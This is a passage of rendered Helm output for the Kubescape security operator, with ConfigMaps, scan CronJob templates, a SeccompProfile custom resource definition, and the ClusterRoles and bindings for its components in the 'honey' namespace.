\"ruleCooldownDuration\"\ + : \"0h\",\n \"ruleCooldownAfterCount\": 1e+09,\n \"ruleCooldownOnProfileFailure\"\ + : false,\n \"ruleCooldownMaxSize\": 20000\n }\n}\n" +--- +apiVersion: v1 +kind: ConfigMap +metadata: + name: operator + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + config.json: "{\n \"excludeNamespaces\": \"kubescape,kube-system,kube-public,kube-node-lease,local-path-storage,gmp-system,gmp-public,storm,lightening,cert-manager,kube-flannel,ingress-nginx,olm,px-operator,honey,pl,clickhouse\"\ + ,\n \"namespace\": \"honey\",\n \"triggersecurityframework\": true,\n \"podScanGuardTime\"\ + : \"1h\",\n \"excludeJsonPaths\":null,\n \"httpExporterConfig\":{\"maxAlertsPerMinute\"\ + :1000,\"method\":\"POST\",\"url\":\"http://synchronizer:8089/apis/v1/kubescape.io\"\ + },\n \"nodeAgentAutoscaler\": {\n \"enabled\": false,\n \"nodeGroupLabel\"\ + : \"node.kubernetes.io/instance-type\",\n \"resourcePercentages\": {\n \ + \ \"requestCPU\": 2,\n \"requestMemory\": 2,\n \"limitCPU\": 5,\n \ + \ \"limitMemory\": 5\n },\n \"minResources\": {\n \"cpu\": \"100m\"\ + ,\n \"memory\": \"600Mi\"\n },\n \"maxResources\": {\n \"cpu\"\ + : \"2000m\",\n \"memory\": \"4Gi\"\n },\n \"reconcileInterval\": \"\ + 5m\",\n \"templatePath\": \"/etc/templates/daemonset-template.yaml\",\n \ + \ \"operatorDeploymentName\": \"operator\"\n }\n}\n" +--- +kind: ConfigMap +apiVersion: v1 +metadata: + name: kubescape-cronjob-template + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: ks-cloud-config + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: ks-cloud-config + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + cronjobTemplate: "apiVersion: batch/v1\nkind: CronJob\nmetadata:\n name: kubescape-scheduler\n\ + \ namespace: honey\n labels:\n app: kubescape-scheduler\n tier: ks-control-plane\n\ + \ kubescape.io/tier: \"core\"\n armo.tier: \"kubescape-scan\"\nspec:\n \ + \ schedule: \"0 8 * * *\"\n successfulJobsHistoryLimit: 3\n failedJobsHistoryLimit:\ + \ 1\n jobTemplate:\n spec:\n template:\n metadata:\n \ + \ labels:\n armo.tier: \"kubescape-scan\"\n kubescape.io/tier:\ + \ \"core\"\n spec:\n securityContext:\n seccompProfile:\n\ + \ type: RuntimeDefault\n containers:\n - name:\ + \ kubescape-scheduler\n image: \"quay.io/kubescape/http-request:v0.2.16\"\ + \n imagePullPolicy: IfNotPresent\n securityContext:\n \ + \ allowPrivilegeEscalation: false\n readOnlyRootFilesystem:\ + \ true\n runAsNonRoot: true\n runAsUser: 100\n \ + \ resources:\n limits:\n cpu: 10m\n \ + \ memory: 20Mi\n requests:\n cpu: 1m\n \ + \ memory: 10Mi\n args:\n - -method=post\n \ + \ - -scheme=http\n - -host=operator:4002\n \ + \ - -path=v1/triggerAction\n - -headers=Content-Type:application/json\n\ + \ - -path-body=/home/ks/request-body.json\n volumeMounts:\n\ + \ - name: \"request-body-volume\"\n mountPath: /home/ks/request-body.json\n\ + \ subPath: request-body.json\n readOnly: true\n\ + \ restartPolicy: Never\n serviceAccountName: kubescape\n \ + \ automountServiceAccountToken: false\n nodeSelector:\n \ + \ kubernetes.io/os: linux\n affinity:\n tolerations:\n \ + \ volumes:\n - name: \"request-body-volume\" # placeholder\n\ + \ configMap:\n name: kubescape-scheduler" +--- +kind: ConfigMap +apiVersion: v1 +metadata: + name: kubevuln-cronjob-template + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: ks-cloud-config + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: ks-cloud-config + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + cronjobTemplate: "apiVersion: batch/v1\nkind: CronJob\nmetadata:\n name: kubevuln-scheduler\n\ + \ namespace: honey\n labels:\n app: kubevuln-scheduler\n tier: ks-control-plane\n\ + \ kubescape.io/tier: \"core\"\n armo.tier: \"vuln-scan\"\nspec:\n schedule:\ + \ \"0 0 * * *\"\n successfulJobsHistoryLimit: 3\n failedJobsHistoryLimit: 1\n\ + \ jobTemplate:\n spec:\n template:\n metadata:\n labels:\n\ + \ armo.tier: \"vuln-scan\"\n kubescape.io/tier: \"core\"\ + \n spec:\n securityContext:\n seccompProfile:\n \ + \ type: RuntimeDefault\n containers:\n - name: kubevuln-scheduler\n\ + \ image: \"quay.io/kubescape/http-request:v0.2.16\"\n imagePullPolicy:\ + \ IfNotPresent\n securityContext:\n allowPrivilegeEscalation:\ + \ false\n readOnlyRootFilesystem: true\n runAsNonRoot:\ + \ true\n runAsUser: 100\n resources:\n limits:\n\ + \ cpu: 10m\n memory: 20Mi\n requests:\n\ + \ cpu: 1m\n memory: 10Mi\n args:\n \ + \ - -method=post\n - -scheme=http\n - -host=operator:4002\n\ + \ - -path=v1/triggerAction\n - -headers=Content-Type:application/json\n\ + \ - -path-body=/home/ks/request-body.json\n volumeMounts:\n\ + \ - name: \"request-body-volume\"\n mountPath: /home/ks/request-body.json\n\ + \ subPath: request-body.json\n readOnly: true\n\ + \ restartPolicy: Never\n serviceAccountName: kubevuln\n \ + \ automountServiceAccountToken: false\n nodeSelector:\n \ + \ kubernetes.io/os: linux\n affinity:\n tolerations:\n \ + \ volumes:\n - name: \"request-body-volume\" # placeholder\n\ + \ configMap:\n name: kubevuln-scheduler" +--- +apiVersion: v1 +kind: ConfigMap +metadata: + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: ks-cloud-config + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: ks-cloud-config + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core + name: registry-scan-cronjob-template +data: + cronjobTemplate: "apiVersion: batch/v1\nkind: CronJob\nmetadata:\n name: registry-scheduler\n\ + \ namespace: honey\n labels:\n app: registry-scheduler\n kubescape.io/tier:\ + \ \"core\"\n tier: ks-control-plane\n armo.tier: \"registry-scan\"\nspec:\n\ + \ schedule: \"0 0 * * *\"\n successfulJobsHistoryLimit: 3\n failedJobsHistoryLimit:\ + \ 1\n jobTemplate:\n spec:\n template:\n metadata:\n \ + \ labels:\n armo.tier: \"registry-scan\"\n kubescape.io/tier:\ + \ \"core\"\n spec:\n securityContext:\n seccompProfile:\n\ + \ type: RuntimeDefault\n containers:\n - name:\ + \ registry-scheduler\n image: \"quay.io/kubescape/http-request:v0.2.16\"\ + \n imagePullPolicy: IfNotPresent\n securityContext:\n \ + \ allowPrivilegeEscalation: false\n readOnlyRootFilesystem:\ + \ true\n runAsNonRoot: true\n runAsUser: 100\n \ + \ resources:\n limits:\n cpu: 10m\n \ + \ memory: 20Mi\n requests:\n cpu: 1m\n \ + \ memory: 10Mi\n args:\n - -method=post\n \ + \ - -scheme=http\n - -host=operator:4002\n \ + \ - -path=v1/triggerAction\n - -headers=Content-Type:application/json\n\ + \ - -path-body=/home/ks/request-body.json\n volumeMounts:\n\ + \ - name: \"request-body-volume\"\n mountPath: /home/ks/request-body.json\n\ + \ subPath: request-body.json\n readOnly: true\n\ + \ restartPolicy: Never\n serviceAccountName: kubevuln\n \ + \ automountServiceAccountToken: false\n nodeSelector:\n \ + \ kubernetes.io/os: linux\n affinity:\n tolerations:\n \ + \ volumes:\n - name: \"request-body-volume\" # placeholder\n\ + \ configMap:\n name: registry-scheduler" +--- +apiVersion: v1 +kind: ConfigMap +metadata: + name: storage + namespace: honey + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + config.json: "{\n \"cleanupInterval\": \"6h\",\n \"disableVirtualCRDs\": false,\n\ + \ \"disableSeccompProfileEndpoint\": true,\n \"excludeJsonPaths\": null,\n \ + \ \"defaultQueueLength\": 100,\n \"defaultWorkerCount\": 2,\n \"defaultMaxObjectSize\"\ + : 400000,\n \"queueManagerEnabled\": true,\n \"kindQueues\": {\"applicationprofiles\"\ + :{\"maxObjectSize\":20000000,\"queueLength\":50,\"workerCount\":2},\"containerprofiles\"\ + :{\"maxObjectSize\":2500000,\"queueLength\":50,\"workerCount\":2},\"networkneighborhoods\"\ + :{\"maxObjectSize\":10000000,\"queueLength\":50,\"workerCount\":2},\"openvulnerabilityexchangecontainers\"\ + :{\"maxObjectSize\":500000,\"queueLength\":50,\"workerCount\":1},\"sbomsyftfiltereds\"\ + :{\"maxObjectSize\":50000000,\"queueLength\":50,\"workerCount\":1},\"sbomsyfts\"\ + :{\"maxObjectSize\":100000000,\"queueLength\":50,\"workerCount\":1},\"vulnerabilitymanifests\"\ + :{\"maxObjectSize\":50000000,\"queueLength\":50,\"workerCount\":1}},\n \"tlsClientCaFile\"\ + : \"/var/run/secrets/kubernetes.io/serviceaccount/ca.crt\",\n \"tlsServerCertFile\"\ + : \"/etc/storage-ca-certificates/tls.crt\",\n \"tlsServerKeyFile\": \"/etc/storage-ca-certificates/tls.key\"\ + ,\n \"serverBindPort\": \"8443\"\n}\n" +--- +apiVersion: v1 +kind: PersistentVolumeClaim +metadata: + name: kubescape-storage + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + accessModes: + - ReadWriteOnce + resources: + requests: + storage: 5Gi +--- +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + name: seccompprofiles.kubescape.io + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: seccompprofile + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: seccompprofile + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + group: kubescape.io + names: + plural: seccompprofiles + singular: seccompprofile + kind: SeccompProfile + listKind: SeccompProfileList + shortNames: + - scp + scope: Namespaced + versions: + - name: v1 + served: true + storage: true + schema: + openAPIV3Schema: + type: object + properties: + apiVersion: + type: string + kind: + type: string + metadata: + type: object + spec: + type: object + properties: + containers: + type: array + items: + type: object + properties: + name: + type: string + description: Name of the container + path: + type: string + description: Path to the seccomp profile + spec: + type: object + x-kubernetes-preserve-unknown-fields: true + properties: + disabled: + type: boolean + description: Whether the profile is disabled + baseProfileName: + type: string + description: Name of base profile to union into this profile + defaultAction: + type: string + description: The default action for seccomp + architectures: + type: array + items: + type: string + description: The architecture used for system calls + listenerPath: + type: string + description: Path of UNIX domain socket to contact a seccomp + agent + listenerMetadata: + type: string + description: Opaque data to pass to the seccomp agent + syscalls: + type: array + items: + type: object + properties: + names: + type: array + items: + type: string + description: The names of the syscalls + action: + type: string + description: The action for seccomp rules + errnoRet: + type: integer + format: int64 + description: The errno return code to use + args: + type: array + items: + type: object + properties: + index: + type: integer + format: int64 + description: The index for syscall arguments + value: + type: integer + format: int64 + description: The value for syscall arguments + valueTwo: + type: integer + format: int64 + description: The second value for syscall arguments + op: + type: string + description: The operator for syscall arguments + flags: + type: array + items: + type: string + description: List of flags to use with seccomp(2) + initContainers: + type: array + items: + type: object + properties: + name: + type: string + description: Name of the init container + path: + type: string + description: Path to the seccomp profile + spec: + type: object + x-kubernetes-preserve-unknown-fields: true + properties: + disabled: + type: boolean + description: Whether the profile is disabled + baseProfileName: + type: string + description: Name of base profile to union into this profile + defaultAction: + type: string + description: The default action for seccomp + architectures: + type: array + items: + type: string + description: The architecture used for system calls + listenerPath: + type: string + description: Path of UNIX domain socket to contact a seccomp + agent + listenerMetadata: + type: string + description: Opaque data to pass to the seccomp agent + syscalls: + type: array + items: + type: object + properties: + names: + type: array + items: + type: string + description: The names of the syscalls + action: + type: string + description: The action for seccomp rules + errnoRet: + type: integer + format: int64 + description: The errno return code to use + args: + type: array + items: + type: object + properties: + index: + type: integer + format: int64 + description: The index for syscall arguments + value: + type: integer + format: int64 + description: The value for syscall arguments + valueTwo: + type: integer + format: int64 + description: The second value for syscall arguments + op: + type: string + description: The operator for syscall arguments + flags: + type: array + items: + type: string + description: List of flags to use with seccomp(2) + ephemeralContainers: + type: array + items: + type: object + properties: + name: + type: string + description: Name of the ephemeral container + path: + type: string + description: Path to the seccomp profile + spec: + type: object + x-kubernetes-preserve-unknown-fields: true + properties: + disabled: + type: boolean + description: Whether the profile is disabled + baseProfileName: + type: string + description: Name of base profile to union into this profile + defaultAction: + type: string + description: The default action for seccomp + architectures: + type: array + items: + type: string + description: The architecture used for system calls + listenerPath: + type: string + description: Path of UNIX domain socket to contact a seccomp + agent + listenerMetadata: + type: string + description: Opaque data to pass to the seccomp agent + syscalls: + type: array + items: + type: object + properties: + names: + type: array + items: + type: string + description: The names of the syscalls + action: + type: string + description: The action for seccomp rules + errnoRet: + type: integer + format: int64 + description: The errno return code to use + args: + type: array + items: + type: object + properties: + index: + type: integer + format: int64 + description: The index for syscall arguments + value: + type: integer + format: int64 + description: The value for syscall arguments + valueTwo: + type: integer + format: int64 + description: The second value for syscall arguments + op: + type: string + description: The operator for syscall arguments + flags: + type: array + items: + type: string + description: List of flags to use with seccomp(2) + status: + type: object + properties: + containers: + type: object + additionalProperties: + type: object + properties: + conditions: + type: array + items: + type: object + properties: + type: + type: string + description: Type of this condition + status: + type: string + description: Status of this condition (True, False, Unknown) + lastTransitionTime: + type: string + format: date-time + description: Last time this condition transitioned + reason: + type: string + description: Reason for this condition's last transition + message: + type: string + description: Message about this condition's last transition + status: + type: string + description: Profile state + path: + type: string + description: Path to the seccomp profile + activeWorkloads: + type: array + items: + type: string + description: Active workloads using this profile + localhostProfile: + type: string + description: Path for securityContext.seccompProfile.localhostProfile + subresources: + status: {} + additionalPrinterColumns: + - name: Age + type: date + jsonPath: .metadata.creationTimestamp +--- +kind: ClusterRole +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: kubescape + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape + tier: ks-control-plane + kubescape.io/ignore: 'true' +rules: +- apiGroups: + - '' + resources: + - pods + - pods/proxy + - namespaces + - nodes + - configmaps + - services + - serviceaccounts + - endpoints + - persistentvolumeclaims + - persistentvolumes + - limitranges + - replicationcontrollers + - podtemplates + - resourcequotas + - events + verbs: + - get + - watch + - list +- apiGroups: + - '' + resources: + - secrets + verbs: + - get + - watch + - list +- apiGroups: + - admissionregistration.k8s.io + resources: + - mutatingwebhookconfigurations + - validatingwebhookconfigurations + verbs: + - get + - watch + - list +- apiGroups: + - apiregistration.k8s.io + resources: + - apiservices + verbs: + - get + - watch + - list +- apiGroups: + - apps + resources: + - deployments + - statefulsets + - daemonsets + - replicasets + - controllerrevisions + verbs: + - get + - watch + - list +- apiGroups: + - autoscaling + resources: + - horizontalpodautoscalers + verbs: + - get + - watch + - list +- apiGroups: + - batch + resources: + - jobs + - cronjobs + verbs: + - get + - watch + - list +- apiGroups: + - coordination.k8s.io + resources: + - leases + verbs: + - get + - watch + - list +- apiGroups: + - discovery.k8s.io + resources: + - endpointslices + verbs: + - get + - watch + - list +- apiGroups: + - events.k8s.io + resources: + - events + verbs: + - get + - watch + - list +- apiGroups: + - hostdata.kubescape.cloud + resources: + - APIServerInfo + - ControlPlaneInfo + verbs: + - get + - watch + - list +- apiGroups: + - networking.k8s.io + resources: + - networkpolicies + - Ingress + verbs: + - get + - watch + - list +- apiGroups: + - cilium.io + resources: + - ciliumnetworkpolicies + verbs: + - get + - list + - watch +- apiGroups: + - projectcalico.org + resources: + - networkpolicies + verbs: + - get + - list + - watch +- apiGroups: + - networking.istio.io + resources: + - gateways + - virtualservices + verbs: + - get + - list + - watch +- apiGroups: + - security.istio.io + resources: + - authorizationpolicies + verbs: + - get + - list + - watch +- apiGroups: + - policy + resources: + - poddisruptionbudgets + - podsecuritypolicies + - PodSecurityPolicy + verbs: + - get + - watch + - list +- apiGroups: + - rbac.authorization.k8s.io + resources: + - clusterroles + - clusterrolebindings + - roles + - rolebindings + verbs: + - get + - watch + - list +- apiGroups: + - storage.k8s.io + resources: + - csistoragecapacities + - storageclasses + verbs: + - get + - watch + - list +- apiGroups: + - networking.k8s.io + resources: + - ingresses + verbs: + - get + - watch + - list +- apiGroups: + - extensions + resources: + - Ingress + verbs: + - get + - watch + - list +- apiGroups: + - gateway.networking.k8s.io + resources: + - httproutes + - gateways + - gatewayclasses + - tcproutes + - tlsroutes + - udproutes + verbs: + - get + - watch + - list +- apiGroups: + - '' + resources: + - namespaces + verbs: + - update +- apiGroups: + - spdx.softwarecomposition.kubescape.io + resources: + - workloadconfigurationscans + - workloadconfigurationscansummaries + verbs: + - create + - get + - update + - patch +- apiGroups: + - kubescape.io + resources: + - servicesscanresults + verbs: + - get + - watch + - list +--- +kind: ClusterRole +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: kubevuln + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubevuln + tier: ks-control-plane + kubescape.io/ignore: 'true' +rules: +- apiGroups: + - spdx.softwarecomposition.kubescape.io + resources: + - vulnerabilitymanifests + - vulnerabilitymanifestsummaries + - openvulnerabilityexchangecontainers + - sbomsyfts + - sbomsyftfiltereds + verbs: + - create + - get + - update + - watch + - list + - patch +- apiGroups: + - spdx.softwarecomposition.kubescape.io + resources: + - containerprofiles + verbs: + - get + - watch + - list +--- +kind: ClusterRole +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: node-agent + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: node-agent + tier: ks-control-plane + kubescape.io/ignore: 'true' +rules: +- apiGroups: + - '' + resources: + - nodes + - nodes/proxy + - services + - endpoints + - namespaces + - configmaps + verbs: + - get + - watch + - list +- apiGroups: + - '' + resources: + - pods + verbs: + - get + - watch + - list + - delete +- apiGroups: + - '' + resources: + - events + verbs: + - get + - watch + - list +- apiGroups: + - batch + resources: + - jobs + - cronjobs + verbs: + - get + - watch + - list +- apiGroups: + - apps + resources: + - deployments + - daemonsets + - statefulsets + - replicasets + verbs: + - get + - watch + - list +- apiGroups: + - spdx.softwarecomposition.kubescape.io + resources: + - applicationprofiles + - networkneighborhoods + verbs: + - get + - watch + - list +- apiGroups: + - kubescape.io + resources: + - seccompprofiles + verbs: + - get + - watch + - list +- apiGroups: + - spdx.softwarecomposition.kubescape.io + resources: + - containerprofiles + - sbomsyfts + verbs: + - create + - get + - update + - watch + - list + - patch +- apiGroups: + - kubescape.io + resources: + - runtimerulealertbindings + verbs: + - list + - watch +- apiGroups: + - kubescape.io + resources: + - operatorcommands + verbs: + - get + - watch + - list +- apiGroups: + - kubescape.io + resources: + - operatorcommands/status + verbs: + - get + - watch + - list + - update + - patch +- apiGroups: + - events.k8s.io + resources: + - events + verbs: + - create + - patch + - get +- apiGroups: + - kubescape.io + resources: + - rules + verbs: + - list + - watch +--- +kind: ClusterRole +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: operator + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' +rules: +- apiGroups: + - '' + resources: + - pods + - nodes + - namespaces + - configmaps + - services + verbs: + - get + - watch + - list +- apiGroups: + - '' + resources: + - events + verbs: + - create + - patch +- apiGroups: + - '' + resources: + - secrets + verbs: + - get + - watch + - list +- apiGroups: + - batch + resources: + - jobs + - cronjobs + verbs: + - get + - watch + - list + - create + - update + - delete + - patch +- apiGroups: + - apps + resources: + - deployments + - daemonsets + - statefulsets + - replicasets + verbs: + - get + - watch + - list +- apiGroups: + - spdx.softwarecomposition.kubescape.io + resources: + - vulnerabilitymanifests + - vulnerabilitymanifestsummaries + - workloadconfigurationscans + - workloadconfigurationscansummaries + - openvulnerabilityexchangecontainers + - containerprofiles + - sbomsyfts + verbs: + - get + - watch + - list + - delete +- apiGroups: + - kubescape.io + resources: + - runtimerulealertbindings + verbs: + - list + - watch + - get +- apiGroups: + - kubescape.io + resources: + - servicesscanresults + verbs: + - get + - watch + - list + - create + - update + - delete + - patch +- apiGroups: + - kubescape.io + resources: + - operatorcommands + verbs: + - get + - watch + - list + - create + - update + - patch +- apiGroups: + - kubescape.io + resources: + - operatorcommands/status + verbs: + - get + - watch + - list + - update + - patch +--- +kind: ClusterRole +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: prometheus-exporter + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: prometheus-exporter + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: prometheus-exporter + tier: ks-control-plane + kubescape.io/ignore: 'true' +rules: +- apiGroups: + - spdx.softwarecomposition.kubescape.io + resources: + - configurationscansummaries + - vulnerabilitysummaries + verbs: + - get + - watch + - list +--- +kind: ClusterRole +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: storage + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' +rules: +- apiGroups: + - '' + resources: + - namespaces + - pods + - services + verbs: + - get + - watch + - list +- apiGroups: + - admissionregistration.k8s.io + resources: + - mutatingwebhookconfigurations + - validatingwebhookconfigurations + verbs: + - get + - watch + - list +- apiGroups: + - apps + resources: + - daemonsets + - deployments + - replicasets + - statefulsets + verbs: + - get + - watch + - list +- apiGroups: + - batch + resources: + - cronjobs + - jobs + verbs: + - get + - watch + - list +- apiGroups: + - flowcontrol.apiserver.k8s.io + resources: + - prioritylevelconfigurations + - flowschemas + verbs: + - get + - watch + - list +--- +kind: ClusterRoleBinding +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: kubescape + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape + tier: ks-control-plane + kubescape.io/ignore: 'true' +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: kubescape +subjects: +- kind: ServiceAccount + name: kubescape + namespace: honey +--- +kind: ClusterRoleBinding +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: kubevuln + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubevuln + tier: ks-control-plane + kubescape.io/ignore: 'true' +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: kubevuln +subjects: +- kind: ServiceAccount + name: kubevuln + namespace: honey +--- +kind: ClusterRoleBinding +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: node-agent + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: node-agent + tier: ks-control-plane + kubescape.io/ignore: 'true' +subjects: +- kind: ServiceAccount + name: node-agent + namespace: honey +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: node-agent +--- +kind: ClusterRoleBinding +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: operator + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' +subjects: +- kind: ServiceAccount + name: operator + namespace: honey +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: operator +--- +kind: ClusterRoleBinding +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: prometheus-exporter + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: prometheus-exporter + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: prometheus-exporter + tier: ks-control-plane + kubescape.io/ignore: 'true' +subjects: +- kind: ServiceAccount + name: prometheus-exporter + namespace: honey +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: prometheus-exporter +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: storage:system:auth-delegator + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: system:auth-delegator +subjects: +- kind: ServiceAccount + name: storage + namespace: honey +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: storage + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: storage +subjects: +- kind: ServiceAccount + name: storage + namespace: honey +--- +kind: Role +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: kubescape + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape + tier: ks-control-plane + kubescape.io/ignore: 'true' +rules: +- apiGroups: + - apps + resources: + - daemonsets + verbs: + - create + - get + - update + - watch + - list + - patch + - delete +--- +kind: Role +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: operator + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' +rules: +- apiGroups: + - '' + resources: + - configmaps + - secrets + verbs: + - create + - get + - update + - watch + - list + - patch + - delete +- apiGroups: + - batch + resources: + - cronjobs + verbs: + - create + - get + - update + - watch + - list + - patch + - delete +--- +kind: RoleBinding 